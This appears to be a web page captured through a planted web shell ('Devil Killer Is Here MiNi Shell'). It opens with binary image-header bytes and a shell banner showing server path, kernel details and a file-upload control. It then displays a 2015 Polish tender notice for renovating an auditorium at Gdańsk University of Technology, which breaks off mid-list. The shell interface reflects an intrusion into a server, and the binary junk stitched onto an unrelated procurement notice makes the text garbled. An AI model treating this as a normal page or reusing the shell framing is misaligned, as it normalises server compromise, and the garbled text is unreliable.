JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150326/68264-N-2015.html

<p class="kh_header"><b>Gdańsk: Wykonanie remontu Audytorium NE 1/L/P w budynku 
WETI B Politechniki Gdańskiej</b><br>
<b>Numer ogłoszenia: 68264 - 2015; data zamieszczenia: 26.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 348 61 52, faks +48 58 347 24 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.pg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu Audytorium NE 1/L/P w budynku 
WETI B Politechniki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie remontu Audytorium NE 1/L/P w budynku WETI B 
   Politechniki Gdańskiej

2. Zakres prac obejmuje remont:
   Branża budowlana
   - wymianę wykładziny na posadzce audytorium i w przedsionkach,
   - wymianę żaluzji na oknach w audytorium,
   - malowanie sufitów i ścian w dwóch przedsionkach prowadzących do audytorium,
   - remont istniejącej ścianki przesuwnej dzielącej audytorium na dwa pomieszczenia
   Branża elektryczna
   - instalację gniazd wtykowych ogólnych w rejonie siedzisk audytorium
   - wykonanie orurowania dla kablowania multimediów w rejonie audytorium,
   - wykonanie dostosowania podświetlenia progów schodowych audytorium,
   - wykonanie robót przygotowawczych i wykończeniowych dla realizacji robót wymienionych powyżej

3. Dane liczbowe dla remontowanych pomieszczeń :
1.	Audytorium :
-	długość 21m
-	szerokość 24m
-	wysokość 7,5m,
-	powierzchnia  użytkowa całej sali - 463,3m2 , po podzieleniu audytorium ścianą przesuwną każda z dwóch części ma powierzchnię 231,6m2
-	kubatura całej sali 3 100m3, każdej z dwóch części 1550m3
-	pojemność widowni  478miejsc,
2.	Przedsionek audytorium oznaczenie na drzwiach nr 115:
 -   powierzchnia     7,6m2,
-	wysokość  3,42m
3.	Przedsionek audytorium oznaczenie na drzwiach nr 131:
-    powierzchnia     7,6m2,
-	wysokość  3,42m
Razem powierzchnia pomieszczeń remontowanych wynosi  478,2 m2.

4.	Opis i zakres prac przewidzianych do wykonania.

4.1.	Zakres robót dla pomieszczenia audytoryjnego.
Przewiduje się następujący zakres robót do wykonania:
4.1.1	Roboty rozbiórkowe:
-	demontaż balustrad w pomieszczeniu,
-	demontaż siedzisk mocowanych do posadzki,
-	demontaż listew z nosków stopni schodowych i uskoków auli,
-	zerwanie wykładziny dywanowej igłowej z całej powierzchni auli,
-	wykucie bruzd do doprowadzenia kabli w posadzce wg projektu elektrycznego,
-	demontaż istniejących rolet materiałowych z okien 
4.1.2	Roboty wykończeniowe:
-	wzmocnienie gniazd pod  słupki balustrad,
-	oczyszczenie posadzki z kleju i naprawa uszkodzonych miejsc w posadzce,
-	zagruntowanie podłoża posadzki i wykonanie warstwy z masy samopoziomującej,
-	wykonanie nowej posadzki z wykładziny rulonowej PCV  gr min 4mm akustycznej,   
-	zamontowanie profilowanych listew na noskach stopni schodowych i uskokach posadzki,
-	ponowne zamontowanie zdemontowanych siedzisk 
-	ponowny montaż balustrad, 
-	montaż na oknach żaluzji z lameli aluminiowych,
-	remont i konserwacja ścianki przesuwnej dzielącej audytorium  na 2 pomieszczenia. 

4.2	Zakres robót dla przedsionków  prowadzących  do sali audytoryjnej.
Przewiduje się następujący zakres robót do wykonania:
4.2.1	Roboty rozbiórkowe:
-	demontaż cokołów przypodłogowych,
-	zerwanie wykładziny dywanowej, igłowej z posadzki,
4.2.2	Roboty wykończeniowe:
-	oczyszczenie posadzki z kleju i naprawa uszkodzonych miejsc w posadzce,
-	zagruntowanie podłoża posadzki i wykonanie warstwy z masy samopoziomującej,
-	wykonanie nowej posadzki z wykładziny rulonowej PCV  gr min 4 mm akustycznej
-	zamontowanie cokołów na ścianie na wysokość 10cm. 
-	zamocowanie w posadzce odbojów  drzwiowych,
-	zamontowanie w posadzce tulei pod skrzydłem drzwiowym, do blokady drzwi
-	zmycie ścian i sufitu z kurzu i zabrudzeń,
-	naprawa uszkodzeń tynków 
-	pokrycie ścian i sufitów gruntem, 
-	malowanie pomieszczeń: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną w kolorze uzgodnionym z użytkownikiem. 

4.3.	 Zakres robót dla gniazd wtykowych pomieszczenia audytorium NE 1/L/P
Dla radykalnej poprawy komfortu korzystania z przenośnych urządzeń multimedialnych  w rejonie  siedzisk  audytorium projektuje się wykonanie systemu  gniazd wtykowych 230V. Gniazda wtykowe zostaną zamontowane  w strefie przyposadzkowej na boku schodkowym za siedziskami w grupach po dwa gniazda  zgodnie z  przewidzianymi dokładnymi lokalizacjami pokazanymi na  rysunku nr 1E.

W pomieszczeniu obsługi audytorium ( pom. 3/31) w istniejącej rozdzielnicy
2RG3 należy przebudować miejsce wprowadzenia istniejącego wlz  tj. YKY 5x16 mm2 , przed wyłącznikiem głównym ,  o dodatkowy ZUG-10 w celu wyprowadzenia odejścia przewodem YDY 5x10 mm2 450/750 do nowoprojektowanej rozdzielnicy Rgwt  , którą należy zlokalizować  bezpośrednio przy rozdzielnicy 2RG3  od strony audytorium.  

Rozdzielnicę Rgwt  wykonać  zgodnie z rysunkiem nr 2E.
Przewód zasilający YDY 5x10 mm2 450/750 oraz przewody obejściowe w kierunku sali audytorium 10 x YDY 3x2,5 mm2 450/750 prowadzić  w indywidualnych peszlach o odpowiedniej średnicy pod  istniejącą płytą g-k. Wykonać z pomieszczenia 3/31  przejście w strefie posadzkowej do strefy posadzkowej sali audytorium.

Obwody zasilające gniazda wtykowe  na terenie sali audytoryjnej należy prowadzić w posadzce po uprzednim  wykonaniu indywidualnych bruzd , wykonanych odpowiednim narzędziem bruzdującym , dopasowanych do przewodu zasilającego YDY 3x2,5 mm2 450/750 prowadzonym w osłonie peszla o optymalnej średnicy , zapewniających normatywne przykrycie.
Stosować gniazda wtykowe 230V 16A/Z pt w ramkach podwójnych  IP44 koloru szarego z klapką przydymianą.  Gniazda wtykowe odpowiednio pooznaczać.

Po wykonaniu robót instalacyjnych należy wykonać pomiary pomontażowe , których potwierdzeniem zdolności eksploatacyjnych będą sporządzone odpowiednie protokoły  załączone do dokumentacji odbiorowej. 

4.4.	Zakres robót rurowania dla kablowania multimediów
Dla radykalnej poprawy możliwości rozbudowy  komunikowania multimedialnego  pomiędzy pomieszczeniem obsługi audytorium ( pom. 3/31), pulpitami wykładowców na podeście katedry audytorium oraz studiem nagrań   ( pom. 3/13) projektuje się wykonanie  odpowiedniego rurowania wraz z przepustami.

W celu ułożenia rurowania  należy  wykonać  prace  techniczne odkrywające niezbędne fragmenty istniejącego podestu katedry audytorium , dokonania przejścia ze strefy pod podestem do strefy hallu poziom 2 , rozebrania niezbędnego fragmentu zabudowy g-k  od miejsca przejścia aż do strefy nad sufitem podwieszanym  hallu bezpośrednio pod pomieszczeniem 3/13 poziomu 3 z niezbędnym odkryciem  fragmentu sufitu podwieszanego. Następnie należy wykonać  odpowiednie do zestawu rur  przejście przez strop do pomieszczenia 3/13.

Po wykonaniu ułożenia rurowania należy odtworzyć rozebrane zabudowy podestu , płyt g-k hallu oraz pokrycie sufitu podwieszanego do pierwotnego stanu.
Rurowanie należy wykonać  stosując rury osłonowe giętkie fi 75 karbowane w środku gładkie z  pilotem do przeciągania kabli  w   konfiguracji  zgodnej z rysunkiem nr 3E.

Przewiduje się  następującą konfigurację  tras  rurowania:
-  2 x rura osłonowa pomiędzy  pulpitami wykładowców w podeście katedry
   o długości  2 razy 12 mb
-  2 x rura osłonowa pomiędzy pulpitem wykładowcy ( katedra 1) a pomieszczeniem  3/13 ( studio    
   nagrań) o długości 2 razy 20 mb
- 2 x rura osłonowa pomiędzy pulpitem wykładowcy ( katedr 2) a pomieszczeniem  3/13 ( studio 
  nagrań) o długości 2 razy 20 mb
- 2 x rura osłonowa pomiędzy strefą nad sufitem podwieszanym hallu 
  poziom 2 a pomieszczeniem 3/13 ( studio nagrań) o długości 2 razy 6 mb

Należy pamiętać o zapewnieniu odpowiednich zapasów w miejscach docelowych wykonywanego rurarzu. 

4.5. Zakres robót dla dostosowania podświetlenia progów schodowych w
       pomieszczeniu audytorium NE1/L/P

W związku z wymianą wykładziny w audytorium wymagane jest dostosowanie barwy światła opraw podświetlenia schodów w taki sposób , aby kontrastowała z kolorem  nowej wykładziny. Przewiduje się wymianę źródeł światła w istniejących oprawach podświetlenia w  ilości  104 sztuk  na  źródła światła o kolorze uzgodnionym z Użytkownikiem.
Zdemontowane źródła światła należy przekazać Użytkownikowi.

Bezużyteczne elementy i materiały z wszystkich remontowanych pomieszczeń powinny być wywiezione na wysypisko..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.43.00.00-0, 45.44.00.00-3, 45.31.43.00-4, 45.31.57.00-5, 45.31.10.00-0, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem przystąpienia do przetargu jest wniesienie, przed upływem terminu składania ofert, wadium w wysokości  13 000,00 zł (słownie: trzynaście tysięcy złotych 00/100). 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	w pieniądzu 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,               z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275)
3.	Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy Zamawiającego 	nr 64 1160 2202 0000 0001 8607 3782, w Banku Millennium, z dopiskiem: Remont Audytorium NE 1/L/P w budynku B WETI PG - ZP/29/WETI/15.
Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert tj. do dnia 15 - 04 - 2015 r., do godz. 0945.
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę nie jest warunkiem koniecznym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
4.	Wadium wnoszone w jednej z form określonych w pkt 2 ppkt 2) - 5) następuje poprzez  zdeponowanie za pokwitowaniem oryginału dokumentu w Kwesturze Politechniki Gdańskiej,                  I piętro Gmachu B PG w Gdańsku, przy ul. G. Narutowicza 11/12, w dniach od poniedziałku do piątku, w godz. 900 do 1300 lub przesłanie pocztą na adres Kwestura Politechniki Gdańskiej,                   ul. G. Narutowicza 11/12, 80-233 Gdańsk.
Wadium wniesione w jednej z form określonych w pkt 2 ppkt 2) - 5) Zamawiający będzie uważał za skuteczne tylko wówczas, gdy w terminie najpóźniej składania ofert tj. do dnia                                15 - 04 - 2015 r., do godz. 0945. , Zamawiający otrzyma stosowny dokument. 
5.	Dokument wadialny (poręczenie lub gwarancja) musi być sporządzony zgodnie z obowiązującym prawem i zawierać następujące elementy:
1)	nazwę oraz wskazanie siedziby: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczyciela (Zamawiającego), oraz gwaranta/poręczyciela (banku; instytucji ubezpieczeniowej lub podmiotu poręczającego)
2)	określenie postępowania o udzielenie zamówienia publicznego, którego dotyczy 
3)	kwotę 
4)	termin ważności 
5)	mieć formę oświadczenia bezwarunkowego płatnego na pierwsze pisemne żądanie Zamawiającego, 
6)	być nieodwołalny, 
7)	obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a, 5 ustawy PZP, 
a także obejmować cały okres związania ofertą, określony w specyfikacji.
6.	Zamawiający dokona zwrotu wadium wszystkim Wykonawcom zgodnie z art. 46 ust. 1 do 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia w niniejszym postępowaniu nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał min. 2 roboty budowlane w budynkach użyteczności publicznej, na łączną wartość co najmniej 400 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobą zdolną do wykonania zamówienia, posiadającą doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowiska, jakie zostaną jej powierzone tj.:
a)	osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz doświadczenie w pełnieniu funkcji kierownika budowy  przy realizacji minimum dwóch robót budowlanych w istniejących budynkach 
b)	osobą, która będzie pełnić funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz doświadczenie w pełnieniu funkcji kierownika budowy  przy realizacji minimum dwóch robót budowlanych w istniejących budynkach 
	UWAGA:	
	Zamawiający, określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity: Dz. U. z 2010 r. nr 243, poz. 1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1
    ustawy polegał będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach
    zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych
    podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków
    zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w
    trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na
    potrzeby wykonania zamówienia.
2/ Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w rozdziale IX pkt 1 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, 
a podmioty te będą brać udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego w pkt 2 ust. 1 niniejszego rozdziału tj.:
- oświadczenia o braku podstaw do wykluczenia z postępowania - z wykorzystaniem wzoru - załącznik nr 3 do specyfikacji
3/ Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa w pkt. III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż 6 miesięcy przed terminem składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - długość okresu gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może być dokonana tylko za zgodą obu Stron.
Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu Stron. 
Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru wykonawcy, dotyczących:
a.	terminu
Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w przypadku wystąpienia jednej z niżej wymienionej okoliczności pod warunkiem, że ma ona wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
- przestojów i opóźnień zawinionych przez Zamawiającego,
- działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne),
